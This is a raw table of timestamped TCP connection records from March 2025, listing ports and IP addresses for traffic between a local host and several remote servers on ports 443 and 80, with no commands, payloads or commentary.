Mar 13, 2025 13:35:23.163491011 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:23.163522959 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:23.163825989 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:23.165426970 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:23.165631056 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:23.165664911 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:23.165735006 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:23.165751934 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:24.590353012 CET	443	49697	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:24.590745926 CET	49697	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:25.256544113 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:25.256594896 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:25.256664991 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:25.257240057 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:25.257256031 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:26.553332090 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:26.553500891 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:26.569031000 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:26.569061995 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:26.569328070 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:26.601227045 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:26.601344109 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:26.601377964 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:27.388024092 CET	443	49698	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:27.388540983 CET	49698	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:27.915226936 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:27.915268898 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:27.915361881 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:27.915678978 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:27.915683985 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.850402117 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.850570917 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.851962090 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.851972103 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.852214098 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.864239931 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865089893 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865125895 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865176916 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865192890 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865264893 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865308046 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865412951 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865483046 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865567923 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865582943 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865606070 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865618944 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865712881 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865741968 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865757942 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865780115 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865892887 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865930080 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865952969 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865964890 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.865977049 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.865986109 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.866060019 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.866091967 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.866096973 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.866113901 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.866128922 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.866163015 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.866166115 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.866214037 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:29.866223097 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:29.866308928 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:33.063756943 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:33.063863039 CET	443	49699	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:33.064203978 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:33.064224958 CET	49699	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:33.083978891 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:33.084021091 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:33.084120989 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:33.084614038 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:33.084629059 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:34.357598066 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:34.357671976 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:34.360583067 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:34.360591888 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:34.360847950 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:34.362807035 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:34.363024950 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:34.363053083 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.438729048 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.438776016 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.438800097 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.438833952 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.438839912 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.438854933 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.438886881 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.439193010 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.439246893 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.439253092 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.445218086 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.445264101 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.445312977 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.445321083 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.445332050 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.445379972 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.445513010 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.445532084 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.445540905 CET	49702	443	192.168.2.12	188.114.96.3
Mar 13, 2025 13:35:35.445548058 CET	443	49702	188.114.96.3	192.168.2.12
Mar 13, 2025 13:35:35.457946062 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:35.462654114 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:35.462750912 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:35.462976933 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:35.467644930 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156744957 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156764030 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156796932 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156811953 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156830072 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156846046 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156860113 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156871080 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156879902 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.156900883 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156919003 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.156975031 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.156985998 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.161653996 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.161668062 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.161689043 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.161700010 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.161777020 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.162754059 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.243437052 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283305883 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283318996 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283339977 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283354998 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283405066 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.283459902 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.283485889 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283509970 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283560038 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.283708096 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283731937 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:36.283760071 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:36.326818943 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:38.842365980 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:38.842403889 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:38.842704058 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:38.848912954 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:38.848929882 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.340912104 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.340984106 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:40.343707085 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:40.343720913 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.344002008 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.389350891 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:40.412524939 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:40.460323095 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.782113075 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.796535015 CET	443	49704	172.67.19.24	192.168.2.12
Mar 13, 2025 13:35:40.796603918 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:40.799377918 CET	49704	443	192.168.2.12	172.67.19.24
Mar 13, 2025 13:35:41.054729939 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.055372953 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.059468031 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.059545040 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.060045004 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.060635090 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.062757969 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.062776089 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.067470074 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.067483902 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751621962 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751641035 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751712084 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751724005 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751763105 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.751769066 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751789093 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.751796961 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751816034 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751827002 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751852036 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751856089 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.751868963 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.751897097 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.751933098 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.756562948 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.756588936 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.756599903 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.756640911 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.756680965 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.756731033 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.760101080 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760112047 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760171890 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760174990 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.760212898 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760225058 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760278940 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760279894 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.760291100 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760314941 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760337114 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.760354996 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.760360003 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760371923 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.760421038 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.764969110 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.764981031 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.765002966 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.765029907 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.811233044 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.878465891 CET	80	49706	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.886986017 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887007952 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887029886 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887056112 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.887270927 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887284040 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887311935 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887322903 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887322903 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.887346029 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887363911 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.887389898 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.887950897 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.887984037 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.888031006 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.888302088 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.888335943 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.888348103 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.888365984 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.888385057 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.888387918 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.888412952 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.889086962 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889098883 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889126062 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889133930 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.889144897 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889166117 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.889167070 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889210939 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.889906883 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889924049 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889945030 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.889992952 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.891769886 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.891815901 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:41.891824961 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.920819044 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:41.936204910 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.013885021 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.013920069 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.013938904 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.013948917 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.013968945 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.013982058 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.013999939 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014072895 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014151096 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014162064 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014189005 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014197111 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014247894 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014271021 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014352083 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014364004 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014410019 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014413118 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014425039 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014452934 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014668941 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014703035 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014712095 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014714003 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014739037 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014756918 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.014974117 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.014983892 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015003920 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015022993 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015055895 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015161991 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015176058 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015191078 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015224934 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015233994 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015244007 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015265942 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015279055 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015279055 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015305042 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015307903 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015320063 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015338898 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015350103 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015379906 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015873909 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015883923 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015901089 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015923023 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.015944958 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015955925 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015974998 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015985966 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.015993118 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.016007900 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016017914 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016019106 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.016061068 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.016478062 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016520023 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.016520977 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016532898 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016556978 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016567945 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.016611099 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016622066 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016643047 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.016660929 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.016685009 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.018781900 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.018825054 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.018867970 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.020095110 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.020107031 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.020128965 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.020145893 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.061311007 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.141891003 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.141932011 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.141944885 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.141977072 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.141988993 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.142013073 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.142018080 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.142024040 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.142045975 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.142076015 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.142102003 CET	49705	80	192.168.2.12	185.215.113.51
